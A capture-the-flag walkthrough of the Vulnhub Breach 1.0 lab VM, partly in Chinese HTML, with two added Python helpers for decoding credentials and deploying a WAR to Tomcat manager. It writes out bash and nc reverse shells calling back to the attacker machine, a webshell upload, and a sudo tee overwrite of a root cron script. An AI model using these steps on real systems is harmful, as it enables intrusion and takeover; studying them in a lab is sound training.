Introduction to Vulnhub
Vulnhub is a lab platform that provides a wide range of vulnerable environments for security enthusiasts to practise penetration testing. Most environments are ready-made virtual machine images with several vulnerabilities built in, and they are run in VMware or VirtualBox. Each image has a goal to achieve, usually Boot2root: starting from booting the VM, obtain root privileges on the operating system and read the flag. Site: https://www.vulnhub.com
[image: https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg]

Contents

Vulnhub Penetration Testing Practice (1): Breach1.0
Vulnhub Penetration Testing Practice (2): Billu_b0x
Vulnhub Penetration Testing Practice (3): Bulldog1
Vulnhub Penetration Testing Practice (4): Acid
Vulnhub Penetration Testing Practice (5): LazysysAdmin-1
Vulnhub Penetration Testing Practice (6): Freshly
Vulnhub Penetration Testing Practice (7): FristiLeaks v1.3
Vulnhub Penetration Testing Practice (8): The Ether
Vulnhub Penetration Testing Practice (9): zico2
Vulnhub Penetration Testing Practice (10): Quaoar
Vulnhub Penetration Testing Practice (11): SickOs 1.1
Vulnhub Penetration Testing Practice (12): BSides-Vancouver-2018-Workshop
Vulnhub Penetration Testing Practice (13): Kioptrix 1
Vulnhub Penetration Testing Practice (14): Zico2
Vulnhub Penetration Testing Practice (15): Kioptrix 3
Vulnhub Penetration Testing Practice (16): Kioptrix 4

</p><p> </p><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub靶場題解 - 紅日安全團隊</h1><h2><a name='header-n7038' class='md-header-anchor '></a>Vulnhub簡介</h2><p>Vulnhub是一個提供各種漏洞環境的靶場平台,供安全愛好者學習滲透使用,大部分環境是做好的虛擬機鏡像文件,鏡像預先設計了多種漏洞,需要使用VMware或者VirtualBox運行。每個鏡像會有破解的目標,大多是Boot2root,從啟動虛機到獲取操作系統的root權限和查看flag。網址:<a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>第一節 Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n7044' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>靶機說明</h3><p>Breach1.0是一個難度為初級到中級的BooT2Root/CTF挑戰。</p><p>VM虛機配置有靜態IP地址(192.168.110.140),需要將虛擬機網卡設置為host-only方式組網。非常感謝Knightmare和rastamouse進行測試和提供反饋。作者期待大家寫出文章,特別是通過非預期的方式獲取root權限。</p><h3><a name='header-n7052' class='md-header-anchor '></a>目標</h3><p>Boot to root:獲得root權限,查看flag。</p><h3><a name='header-n7055' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機:網絡連接方式設置為主機模式(host-only),靜態IP是192.168.110.140。</li><li>攻擊機:同網段下有Windows攻擊機(物理機),IP地址:192.168.110.220,安裝有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等滲透工具,也可以使用Kali Linux攻擊機。</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>信息收集</h2><ul><li>端口服務識別</li></ul><p>啟動Breach1.0虛擬機,由於IP已知,使用nmap掃描端口,並做服務識別和深度掃描(加-A參數),掃描結果保存到txt文件,命令:</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現端口幾乎全開放了,顯然是有問題,虛擬機對端口掃描做了一些防護措施,直接訪問80端口,進入web首頁:<code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' 
/></p><h2><a name='header-n7078' class='md-header-anchor '></a>漏洞挖掘</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01:查看首頁源碼,解碼得到密碼</h3><p>(1) 查看首頁源碼,發現提示:<code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code> 這是一串base64編碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 將其復制到Burpsuit Decoder進行base64解碼,解密后發現還是base64編碼,繼續base64解碼,得到<code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02:登錄cms,查看郵件,下載包含SSL證書的密鑰庫keystore文件</h3><p>(1) 點擊首頁的圖片,進入<code>initech.html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 點擊initech.html左邊的<code>Employee portal</code>進入到<code>http://192.168.110.140/impresscms/user.php</code> 這是一個impresscms登錄頁</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用之前兩次base64解碼得到的密碼登錄impresscms:</p><p>用戶名:<code>pgibbons</code></p><p>密碼:<code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) exploit-db.com查找impress cms漏洞:發現ImpressCMS 1.3.9 SQL注入漏洞:<code>https://www.exploit-db.com/exploits/39737/</code>,可注入頁面為<code>/modules/profile/admin/field.php</code>,但是該頁面目前沒有權限訪問,無法進行注入。</p><p>(4) 注意左邊的收件箱Inbox顯示有3封郵件,依次打開看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>第1封郵件,主要內容:讓你的團隊只能向管理門戶發布任何敏感的內容。我的密碼非常安全,發自ImpressCMS Admin Bill。</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第2封郵件,主要內容:Michael采購了IDS/IPS。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第3封郵件,主要內容:有一個peter的SSL證書被保存在192.168.110.140/.keystore。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(5) 訪問<code>http://192.168.110.140/.keystore</code>下載包含SSL證書的密鑰庫keystore文件,keystore是存儲公私密鑰的一種文件格式。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /> </p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03:導入流量抓包文件、SSL證書到Wireshark</h3><p>(1) 依次訪問左邊的菜單樹,點擊每個菜單欄:</p><p>content鏈接了一張圖片troll.gif:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>點擊profile會進入目錄瀏覽:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>但都沒發現可利用漏洞,繼續瀏覽每個網頁。</p><p>(2) 點擊<code>View Account</code>菜單進入界面,再依次點擊頁面的<code>Content</code>,會彈出一行鏈接<code>Content SSL implementation test capture</code>,點擊鏈接,如下圖:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(3) 進入<code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>頁面,可以看到一個名為:<code>_SSL_test_phase1.pcap</code>的Wireshark流量包文件,下載它。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>同時,該頁面有重要的提示信息:這個pCAP文件是有紅色團隊的重新攻擊產生的,但是不能讀取文件。而且<code>They told me the alias, storepassword and 
keypassword are all set to 'tomcat'</code>, i.e. the alias, the keystore password and the key password are all <code>tomcat</code>.</p><p>Two inferences: a. the capture cannot be "read" because part of the traffic is SSL-encrypted (the mail supplied a keystore, this page supplies its password); b. the host probably runs Tomcat.</p><p>(4) The Windows attack machine has a JDK; keytool.exe lives in its bin directory, here <code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Copy the keystore to the root of C: and list the certificates it holds with <code>keytool -list -keystore c:\keystore</code>, entering the keystore password tomcat:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Export the key as a .p12. Copy the keystore to the keytool directory and export the tomcat entry as tomcatkeystore.p12:</p><p>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) Load the .p12 into Wireshark.</p><p>With the .p12 in the root of C:, open <code>_SSL_test_phase1.pcap</code> in Wireshark, go to Edit > Preferences > Protocols > SSL (called TLS in newer releases) and click Edit next to the RSA keys list:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Enter 192.168.110.140, 8443, http, pick the certificate file and enter the password tomcat.</p><p>Caveat: decrypting with the server's private key only works for sessions that use RSA key exchange and whose full handshake is in the capture; (EC)DHE cipher suites derive the session key from an ephemeral exchange and cannot be decrypted this way, however valid the key.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04: Recover the Tomcat manager URL and password from the capture</h3><p>(1) With the key loaded, the HTTPS traffic is decrypted; inspect each HTTP packet:</p><p>There is attack traffic from 192.168.110.129 to 192.168.110.140: a command-execution webshell ran id and the attacker uploaded two images, apparently image webshells. The command shell cannot be reached directly, though; it sits behind the Tomcat manager login:</p><p><img 
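hidden alt='' /></p>

<p>Added example (Python, not part of the original writeup): the two decodes from 0x01 and 0x04 done programmatically. <code>peel_base64</code> strips nested base64 layers until the result stops being base64 (the home page hint was encoded twice), and <code>basic_auth_credentials</code> pulls the <code>Authorization: Basic</code> header out of a decrypted HTTP request and splits it into username and password. The request text in the block is a constructed stand-in for the packet seen in Wireshark; only the two base64 values are taken from this page.</p>

```python
"""Decode the layered base64 hint and the HTTP Basic credentials from the capture.

Added example: the two base64 values are the ones quoted in the writeup; the
HTTP request text is constructed here to stand in for the decrypted packet.
"""
import base64
import binascii
import re

# Home page hint (0x01): base64 applied twice.
HOME_PAGE_HINT = "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo"

# Constructed stand-in for the decrypted Tomcat manager request (0x04);
# only the Authorization value is taken from the pcap.
CAPTURED_REQUEST = (
    "GET /_M@nag3Me/html HTTP/1.1\r\n"
    "Host: 192.168.110.140:8443\r\n"
    "Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

_B64_TOKEN = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def strict_b64decode(data: bytes):
    """Decode canonical base64 only; return None for anything else."""
    data = data.strip()
    if not data or len(data) % 4 or not _B64_TOKEN.match(data):
        return None
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel_base64(text: str, max_layers: int = 8):
    """Strip nested base64 layers; return (layers_removed, final_text).

    Stops as soon as the current value is not base64 or decodes to something
    that is not printable ASCII, so plaintext is not mis-decoded as a layer.
    """
    current = text.strip().encode()
    layers = 0
    while layers < max_layers:
        decoded = strict_b64decode(current)
        if decoded is None:
            break
        try:
            as_text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break
        if not as_text.isprintable():
            break
        current = decoded
        layers += 1
    return layers, current.decode("utf-8", "replace")


def basic_auth_credentials(request_text: str):
    """Return (username, password) from an HTTP Basic Authorization header, or None."""
    match = re.search(r"^Authorization:\s*Basic\s+(\S+)\s*$", request_text, re.I | re.M)
    if not match:
        return None
    raw = strict_b64decode(match.group(1).encode())
    if raw is None or b":" not in raw:
        return None
    user, _, password = raw.decode("latin-1").partition(":")
    return user, password


if __name__ == "__main__":
    layers, creds = peel_base64(HOME_PAGE_HINT)
    print(f"home page hint: {layers} base64 layers -> {creds}")
    print("tomcat manager credentials:", basic_auth_credentials(CAPTURED_REQUEST))
```

<p>The strict alphabet check and the printable test stop the peeler from treating a plaintext password that happens to look like base64 as one more layer. A real capture usually holds several Basic headers, so run the extractor over each decrypted request rather than over the whole dump at once.</p>

<p><img 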
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Obtain the Tomcat manager URL and credentials.</p><p>Further along there is an Unauthorized (401) exchange; its request and response reveal the Tomcat manager URL: <code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A later packet carries the credentials as HTTP Basic authentication: <code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The value is base64 of <code>username:password</code>. Decoding <code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code> in Burp Suite Decoder gives the Tomcat credentials.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat manager username: tomcat, password: Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05: Log in to the Tomcat manager and get a shell</h3><p>(1) Log in to the Tomcat manager:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Getting a shell from the Tomcat manager is routine: collect JSP webshells (a small command-execution shell, a China Chopper (caidao) shell and the larger JspSpy shell), zip them into caidao.zip, rename the archive to caidao.war (a WAR is simply a zip) and upload it for deployment:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Upload the WAR under "WAR file to deploy":</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' 
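/></p>

<p>Added example (Python, not the writeup's tooling): building the WAR in memory and preparing the deploy request for Tomcat's manager. A WAR is only a zip, so <code>zipfile</code> is all it takes; the rest shows the manager's text interface, which accepts the WAR as the body of a PUT. Assumptions, not facts from the page: that the text interface is mounted beside the HTML one at <code>/_M@nag3Me/text</code>, and that the tomcat account holds the manager-script role the text interface requires. The JSP inside is a harmless marker page rather than a webshell.</p>

```python
"""Build a WAR in memory and prepare the Tomcat manager deploy request.

Added example, not the writeup's tooling. Assumptions (not from the page): the
manager text interface is mounted beside the HTML one at /_M@nag3Me/text and
the tomcat account holds the manager-script role it requires. The JSP deployed
here is a harmless marker page, not a webshell.
"""
import base64
import io
import zipfile
from urllib.parse import quote

MANAGER_BASE = "https://192.168.110.140:8443/_M@nag3Me"   # from the capture
TOMCAT_USER = "tomcat"                                    # from the capture
TOMCAT_PASSWORD = "Tt\\5D8F(#!*u=G)4m7zB"

# Constructed marker page: prints the account Tomcat runs as.
MARKER_JSP = (
    '<%@ page contentType="text/plain" %>'
    'deployed, running as <%= System.getProperty("user.name") %>\n'
)


def build_war(files):
    """Return WAR bytes for {path_in_archive: content}. A WAR is just a zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        if "WEB-INF/web.xml" not in files:
            # Optional on Tomcat 6+, but an empty descriptor keeps old versions happy.
            war.writestr("WEB-INF/web.xml", '<?xml version="1.0"?><web-app></web-app>')
        for path, content in files.items():
            war.writestr(path, content)
    return buf.getvalue()


def war_entries(war_bytes):
    """Paths inside a WAR, for a sanity check before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def basic_auth_header(user, password):
    """HTTP Basic value: base64 of user:password, the encoding seen in the pcap."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_request(context_path, war_bytes, base=MANAGER_BASE,
                   user=TOMCAT_USER, password=TOMCAT_PASSWORD):
    """Describe the request the manager text interface expects for a remote deploy.

    Tomcat deploys a WAR sent as the body of
    PUT MANAGER/text/deploy?path=CONTEXT&update=true
    """
    url = f"{base}/text/deploy?path={quote(context_path, safe='/')}&update=true"
    headers = {
        "Authorization": basic_auth_header(user, password),
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(war_bytes)),
    }
    return "PUT", url, headers


def send(method, url, headers, body):
    """Send it for real (network; not exercised by the tests)."""
    import ssl
    import urllib.request
    ctx = ssl._create_unverified_context()   # the target uses a self-signed certificate
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=10, context=ctx) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    war = build_war({"marker.jsp": MARKER_JSP})
    method, url, headers = deploy_request("/marker", war)
    print(method, url)
    print(headers["Authorization"])
    print(war_entries(war))
```

<p>If the text interface is not enabled, the HTML form used on this page takes the same WAR bytes as a multipart upload; the archive layout and the Authorization header are identical in both cases.</p>

<p><img hidden alt='' referrerPolicy='no-referrer' 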
/></p><p>After the upload the context /caidao appears in the application list; the uploaded JSP webshells are inside it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Connect with China Chopper (caidao) to <code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) From the caidao command line, id;pwd runs successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) A problem: the uploaded caidao shell disappears after a short while, the file is deleted, and the WAR has to be re-uploaded before caidao works again. The host may run anti-virus or a webshell cleaner. Workaround: spawn a reverse shell with bash.</p><h2><a name='header-n7231' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06: Enumerate system users and find the MySQL root password</h3><p>(1) List the system users and look for UIDs of 1000 and above: cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Two users stand out: milton and blumbergh</p><p>(2) In caidao, find the web root. The shell starts in the Tomcat directory; the site itself is deployed under <code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) That directory holds two oddly named PHP files with long random names, fe4db1f7bc038d60776dcb66ab3404d5.php and 0d93f85c5061c44cdffeb8381b2772fd.php. Download them with caidao and open them:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>They are MySQL connection files: they connect as the MySQL root account with an empty password.</p><p>(4) Because the caidao shell keeps being deleted, spawn a reverse shell to nc instead. From the caidao command line, send a shell back to nc on the Windows attack machine: <code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Connect to MySQL and list its users. After the mysql command nothing is echoed back; the query output only appears once exit has left the mysql client (the reverse shell is not a tty, so the client buffers its output). Commands:</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p>In a shell without a tty it is simpler to run the query non-interactively, e.g. <code>mysql -u root -e 'select user,password from mysql.user'</code>, which prints the result at once.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This yields the password hash of the user milton: <code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>Looking it up at <code>https://www.somd5.com/</code> gives milton's plaintext password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07: Escalate to the users milton and blumbergh</h3><p>(1) su cannot be run: it complains that it needs a terminal. The same problem came up before and Python solves it:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Switch to milton</p><p><code>su - milton</code> password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The file some_script.sh in milton's home directory contains nothing useful.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Check the kernel and distribution version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The kernel is Linux Breach 4.2.0-27-generic, which is not affected by the well-known Ubuntu local root exploit: that one (overlayfs, exploit-db 37292) targets Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04).</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) The command history holds no useful clue, except that su was used to switch to blumbergh; blumbergh's password is needed next.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Seven images have turned up so far: six in the image directory <code>http://192.168.110.140/images/</code> and one in milton's home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>my_badge.jpg</code> in milton's home directory</p><p>Copy the images to Kali Linux, run strings over each to dump its printable characters, append the output to images.txt and read it in vim. The password is in bill.png.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Candidate passwords and hints:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The only real word is <code>coffeestains</code></p><p>Alternatively, exiftool.exe shows the EXIF metadata of bill.png and gives the same candidate password: <code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) Escalate to blumbergh</p><p>Username: blumbergh <br/></p><p>Password: coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7) The command history mentions /usr/share/cleanup and the script tidyup.sh:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Read tidyup.sh:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>It is a cleanup script; its description says it runs every 3 minutes and deletes the files under the webapps directory, which is why the uploaded caidao shell kept vanishing and had to be re-uploaded.</p><p>Check the permissions of tidyup.sh: only root can write it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Check the sudo rights with sudo -l:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The user may run tee and the tidyup.sh script as root: /usr/bin/tee and /usr/share/cleanup/tidyup.sh</p><p>tee reads standard input and writes it to a file; tidyup.sh is the cleanup script. Since root runs that script from cron, being able to write it as root is as good as root.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x08: Get a root reverse shell and the flag</h3><p>(1) Write a reverse shell command into tidyup.sh</p><p>tidyup.sh is writable only by root, but tee may be run as root, so tee can overwrite tidyup.sh. First put the reverse shell command in shell.txt. The bash reverse shell did not work here while nc did, so use the nc form (it needs an nc build that supports -e):</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt</code></p><p>Then write the contents of shell.txt into tidyup.sh with tee (tee truncates the target, so the original script is gone unless it was saved first):</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>Confirm that tidyup.sh was overwritten:</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Listen with nc and wait for the callback; it arrives as root. The flag is an image, so copy it to the home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' 
referrerPolicy='no-referrer' /></p><p>(3) The crontab confirms it: a job runs the tidyup.sh cleanup script every 3 minutes:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Use the JspSpy shell uploaded earlier to download flair.jpg to Windows:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) The flag reads <code>I NEED TO TALK ABOUT YOUR FLAIR</code>. Done.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>Takeaways</h2><h3><a name='header-n7404' class='md-header-anchor '></a>Key breakthroughs</h3><p>(1) Decoding the CMS and Tomcat credentials from the page source and from image metadata.</p><p>(2) Loading the SSL key into Wireshark to decrypt the SSL traffic and recover the Tomcat manager URL and credentials.</p><p>(3) Getting a shell from the Tomcat manager has to be routine.</p><p>(4) Privilege escalation: recovering two account passwords, then finding tee and the cleanup script tidyup.sh runnable as root and using the cron job to obtain a root reverse shell.</p><h3><a name='header-n7413' class='md-header-anchor 